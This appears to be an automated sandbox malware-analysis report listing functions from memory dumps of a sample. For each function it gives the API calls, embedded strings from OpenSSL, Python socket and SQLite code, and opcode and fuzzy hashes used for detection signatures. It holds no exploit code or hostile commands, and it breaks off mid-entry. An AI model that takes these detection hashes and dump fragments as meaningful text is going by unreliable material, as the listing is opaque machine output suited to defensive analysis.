..\s\ssl\ssl_rsa.c, xrefs: 00007FF8A92FA7ED, 00007FF8A92FA82C, 00007FF8A92FA8EA, 00007FF8A92FA956, 00007FF8A92FA9B1, 00007FF8A92FA9CA, 00007FF8A92FA9E4, 00007FF8A92FAA61, 00007FF8A92FAA97, 00007FF8A92FAABB, 00007FF8A92FAAEB, 00007FF8A92FAB0F, 00007FF8A92FAB30, 00007FF8A92FAB46, 00007FF8A92FAB5C, 00007FF8A92FAB72
SERVERINFOV2 FOR , xrefs: 00007FF8A92FA90D
SERVERINFO FOR , xrefs: 00007FF8A92FA8A5

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
Instruction ID: 7d93c594285485eb41571532b4c50df7720580f1e26013cf6aaf0d504d12f946
Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
Instruction Fuzzy Hash: 01B1AD61B0EAC2B5FB109F61D8401FD67B5EF847C4F415032DA1D87A9AEE7CEA4A8350

Function 00007FF8B7E53EA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 89COMMON

Download Yara Rule

Strings

Unknown Bluetooth protocol, xrefs: 00007FF8B7E53F0A
OiII, xrefs: 00007FF8B7E53F96
iy#, xrefs: 00007FF8B7E53EEB

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID:
String ID: OiII$Unknown Bluetooth protocol$iy#
API String ID: 0-1931379703
Opcode ID: 219293d9ed970e924550000fc76a6ba74e53c1685364983c479b9e8f7c0aa3e8
Instruction ID: 8e64a6d26a6c986a60b934eea0c35a9e2c0eb45cf49e7a6df7cfb0108a23e593
Opcode Fuzzy Hash: 219293d9ed970e924550000fc76a6ba74e53c1685364983c479b9e8f7c0aa3e8
Instruction Fuzzy Hash: 4D3105A5A087DA81EF648B19A95547DA3A1AF44FC8B444035CB4E97AB0EF3CB465C310

Function 00007FF8B7E57138 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF8B7E571B2
getservbyport.WS2_32 ref: 00007FF8B7E571C0

Strings

port/proto not found, xrefs: 00007FF8B7E571E3
i|s:getservbyport, xrefs: 00007FF8B7E57148
socket.getservbyport, xrefs: 00007FF8B7E57185
getservbyport: port must be 0-65535., xrefs: 00007FF8B7E57211

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: getservbyporthtons
String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
API String ID: 3477891686-2618607128
Opcode ID: 08d641e2149a9fe32eb83068231b66dcf87bbcbf43cfed86c6688b5a091640e5
Instruction ID: 1c147b61080df09cb2b0e8137fdd86cc5044c6758ca05ce7623b91b6397feb3a
Opcode Fuzzy Hash: 08d641e2149a9fe32eb83068231b66dcf87bbcbf43cfed86c6688b5a091640e5
Instruction Fuzzy Hash: D721E5A5A18B8B81EB008B1AE99467D6360FF89FC5F505031DB4E57674DE3DF058C710

Function 00007FF8A92D231F Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 388COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A9337B72

Strings

tls_process_new_session_ticket, xrefs: 00007FF8A9337B09, 00007FF8A9337DAE, 00007FF8A9337E45, 00007FF8A9337F04
SHA2-256, xrefs: 00007FF8A9337D3D
resumption, xrefs: 00007FF8A9337E7A
..\s\ssl\statem\statem_clnt.c, xrefs: 00007FF8A9337B10, 00007FF8A9337B90, 00007FF8A9337BAC, 00007FF8A9337DBA, 00007FF8A9337E51, 00007FF8A9337EC1, 00007FF8A9337F0B, 00007FF8A9337F3B

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
API String ID: 3535234312-1635961163
Opcode ID: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
Instruction ID: 7af022634306f4a539713fa117cf02c7ac05b9ef01100451180c821b37c211d8
Opcode Fuzzy Hash: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
Instruction Fuzzy Hash: 84028032A0EAC291E7609F15E4803BA77B0EB85BC4F14913ADA9E87795DF3CE591C700

Function 00007FF8A87F5C10 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87F5D24
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87F5EB7

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87F6051
database corruption, xrefs: 00007FF8A87F605E
%s at line %d of [%.10s], xrefs: 00007FF8A87F606A

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3568877910-3764764234
Opcode ID: d7fded3eb334f82a5bc8ccf9ef76d7075bacc3061919e943a1f5875f096b0b35
Instruction ID: d5d255b0e456bc0159e889a5bba3d3f9799b750016e739dc06af8ffdbd98ad66
Opcode Fuzzy Hash: d7fded3eb334f82a5bc8ccf9ef76d7075bacc3061919e943a1f5875f096b0b35
Instruction Fuzzy Hash: 8AD19B72A0AB8A96DB60CF26E1046A977E4FB88BC4F158136DF8D47790DF78D841C714

Function 00007FF8B7E56554 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF8B7E5658C
WSADuplicateSocketW.WS2_32 ref: 00007FF8B7E5659C
WSASocketW.WS2_32 ref: 00007FF8B7E565CF
SetHandleInformation.KERNEL32 ref: 00007FF8B7E565E8
closesocket.WS2_32 ref: 00007FF8B7E565FD
closesocket.WS2_32 ref: 00007FF8B7E56623

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
String ID:
API String ID: 174288908-0
Opcode ID: 7fb88d29fb8f124253cef0c34b5bf16ffbb07c85107e42c4acbe9bd20e36e90a
Instruction ID: 783197ea9236e162ad9240ac42c4f5eb3aada25510e06cf2b54911272f8a06ea
Opcode Fuzzy Hash: 7fb88d29fb8f124253cef0c34b5bf16ffbb07c85107e42c4acbe9bd20e36e90a
Instruction Fuzzy Hash: EF2130A0A197CA81EB649B29A81977E63A1AF48FE4F440735CA6F527F4DF3CF0448700

Function 00007FF8B7E532EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 172networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF8B7E53317
00007FF8C6113440.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B7E53334

Strings

unsupported address family, xrefs: 00007FF8B7E5351A
surrogatepass, xrefs: 00007FF8B7E534E6
NOO, xrefs: 00007FF8B7E534FB

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: 00007C6113440ErrorLast
String ID: NOO$surrogatepass$unsupported address family
API String ID: 181156767-472101058
Opcode ID: a941ae9730ded8f772822ed8a2d782374302fb04319468ce831e81471515d3c7
Instruction ID: 35c3ec7a13b28d699e7d8dac49e5e7334b7d045268b896d4ad13ff7f2bd041c1
Opcode Fuzzy Hash: a941ae9730ded8f772822ed8a2d782374302fb04319468ce831e81471515d3c7
Instruction Fuzzy Hash: 45713BA2A08BCA86EB558B29A81417D63A1BF94FD8F145535EF5E177A4EF3CF481C300

Function 00007FF8B8AF91E0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8B8AF93C1
Base Connection.__init__ not called., xrefs: 00007FF8B8AF931C
Cannot operate on a closed database., xrefs: 00007FF8B8AF9383
factory must return a cursor, not %.100s, xrefs: 00007FF8B8AF92D3

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID:
String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
API String ID: 0-2953218143
Opcode ID: b0658eab8497ceccf96ffad2f0378969048be266a831a6824d1b9b74aa8d3f40
Instruction ID: 115fb9770c2edda0f64b6c7be0c7a5b1ddc5a2e06967f21123ead1c66768ca92
Opcode Fuzzy Hash: b0658eab8497ceccf96ffad2f0378969048be266a831a6824d1b9b74aa8d3f40
Instruction Fuzzy Hash: 12712B36A0AA4283EB548F2AD49617873A1FB45FD5F086035DB0E87754DF3DE856830A

Function 00007FF8B7E56A38 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73COMMON

Download Yara Rule

Strings

unsupported address family, xrefs: 00007FF8B7E56AE8
idna, xrefs: 00007FF8B7E56A62
socket.gethostbyaddr, xrefs: 00007FF8B7E56A8D
et:gethostbyaddr, xrefs: 00007FF8B7E56A69

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID:
String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
API String ID: 0-1751716127
Opcode ID: 5769dd5f58e8a9c8f678f8dac09ed95f83273131b51c435cd3570311299641a0
Instruction ID: e649758e7d9b123ae1db8695da57d0dd6497ca80998e7beb9dfd42402b4c04f8
Opcode Fuzzy Hash: 5769dd5f58e8a9c8f678f8dac09ed95f83273131b51c435cd3570311299641a0
Instruction Fuzzy Hash: 2D3105A1A18BCA81EB609B19E9517BE6361BF88FC4F444032DB4E57669EF3CF544C700

Function 00007FF8B7E57070 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44networkCOMMON

Download Yara Rule

APIs

getservbyname.WS2_32 ref: 00007FF8B7E570DE
htons.WS2_32 ref: 00007FF8B7E57121

Strings

s|s:getservbyname, xrefs: 00007FF8B7E57080
service/proto not found, xrefs: 00007FF8B7E57101
socket.getservbyname, xrefs: 00007FF8B7E570B0

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: getservbynamehtons
String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
API String ID: 3889749166-1257235949
Opcode ID: 9dd5b28ce3685dd1532477a6290ebd183478f563b5b65b0de9f645cbc5bcbcda
Instruction ID: 0c4841bc3c52a2f9e287e826413d2f29ac4f79fb715aa04e089b5bb1f0e49800
Opcode Fuzzy Hash: 9dd5b28ce3685dd1532477a6290ebd183478f563b5b65b0de9f645cbc5bcbcda
Instruction Fuzzy Hash: C811C4A1A08B8B82EB409B1AE95426D6361FF89FC5F500432DB8E67678DF3CF455C740

Function 00007FF8B7E57370 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

GetIfTable2Ex.IPHLPAPI ref: 00007FF8B7E573B1
ConvertInterfaceLuidToNameW.IPHLPAPI ref: 00007FF8B7E57424
FreeMibTable.IPHLPAPI ref: 00007FF8B7E57492
FreeMibTable.IPHLPAPI ref: 00007FF8B7E574ED
FreeMibTable.IPHLPAPI ref: 00007FF8B7E5750B

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: FreeTable$ConvertInterfaceLuidNameTable2
String ID:
API String ID: 1671601251-0
Opcode ID: a29c778bcafa3f3138a556627d91e743bd76927b8f6cbccc6d47cedd6816eead
Instruction ID: 17fa5119370c8421a8ab026265abab27b8f6b9057712f56214b38c8ea66de0c5
Opcode Fuzzy Hash: a29c778bcafa3f3138a556627d91e743bd76927b8f6cbccc6d47cedd6816eead
Instruction Fuzzy Hash: 22410BB1A08BCA85EB649B29E85427D63A1FF89FD5F440031CB4E666A4DF3CF455CB40

Function 00007FF8A8833430 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A883357B

Strings

foreign key on %s should reference only one column of table %T, xrefs: 00007FF8A88334B5
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FF8A88334DE
unknown column "%s" in foreign key definition, xrefs: 00007FF8A88337CC

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3568877910-272990098
Opcode ID: b258cba78216c913fdfc967b650a3a4584fc30d2e89a2d53fb082f1872007e41
Instruction ID: fc173393a1fafb79c607b35f7a1fe89c51318c6398ca64c967e021d1ad28c6ce
Opcode Fuzzy Hash: b258cba78216c913fdfc967b650a3a4584fc30d2e89a2d53fb082f1872007e41
Instruction Fuzzy Hash: EBD12162F0AB86A2EB60CB15A0447BA7BA1FB49BD4F446171DE5E03785DF3CE441C728

Function 00007FF8A8855FB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00000000,?,?,00000000,00007FF8A885685C,?,?,?), ref: 00007FF8A8856030

Strings

column%d, xrefs: 00007FF8A8856185
rowid, xrefs: 00007FF8A8856108
%.*z:%u, xrefs: 00007FF8A8856247

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %.*z:%u$column%d$rowid
API String ID: 3568877910-2903559916
Opcode ID: d66b9d54725f62b5ce1bd60dd10b0ea20f78a451d91f1eae2825429aabd4dd91
Instruction ID: c333afa968b229a16578b0a357860981c27f40c9dba2eaae9d304f048a46c521
Opcode Fuzzy Hash: d66b9d54725f62b5ce1bd60dd10b0ea20f78a451d91f1eae2825429aabd4dd91
Instruction Fuzzy Hash: 20C12232B0A682A5EA69CB1195443BA6BA0FF40FC4F48A2B5DE4D477C5DF3CE401C728

Function 00007FF8A8825F30 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 302COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A882605F
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A8826112

Strings

"%w" , xrefs: 00007FF8A8825FE0
%Q%s, xrefs: 00007FF8A8826284

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: "%w" $%Q%s
API String ID: 3568877910-1987291987
Opcode ID: ea895bfc650ea91978c060a6855d4ea3768f7d4080edd1a1708a15e8b8dd4161
Instruction ID: 7592462deabf4f0feb88413138edb48ca370cad9770f90b545e496a32640fcfa
Opcode Fuzzy Hash: ea895bfc650ea91978c060a6855d4ea3768f7d4080edd1a1708a15e8b8dd4161
Instruction Fuzzy Hash: E3C1DC32B0AA82A6EB14CF56A44427967A0FFA5BE1F484235DE6E477D5EF3CE400C714

Function 00007FF8A87F3D20 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 260COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87F3ECE

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87F3D65
database corruption, xrefs: 00007FF8A87F3D71
%s at line %d of [%.10s], xrefs: 00007FF8A87F3D7D

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3568877910-3764764234
Opcode ID: bee7a4693849ac17a4bb1783f6fa8d2d9d5e3edc2d9436c2f20dc9f1ba8472f5
Instruction ID: dd261d711186f00dea033600174d9c99abf9a87d13245de8f4cc78f0f3e42147
Opcode Fuzzy Hash: bee7a4693849ac17a4bb1783f6fa8d2d9d5e3edc2d9436c2f20dc9f1ba8472f5
Instruction Fuzzy Hash: EAB1EE32B096AA96E764CB2AA044B7AB7A4FF48BC0F014135DE4D47B85DF79E840C714

Function 00007FF8A87EF7C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 255COMMON

Download Yara Rule

Strings

